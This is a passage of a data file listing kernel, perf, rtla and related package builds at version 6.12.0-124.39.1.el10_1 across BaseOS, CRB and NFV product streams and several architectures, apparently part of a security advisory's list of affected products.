"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64",
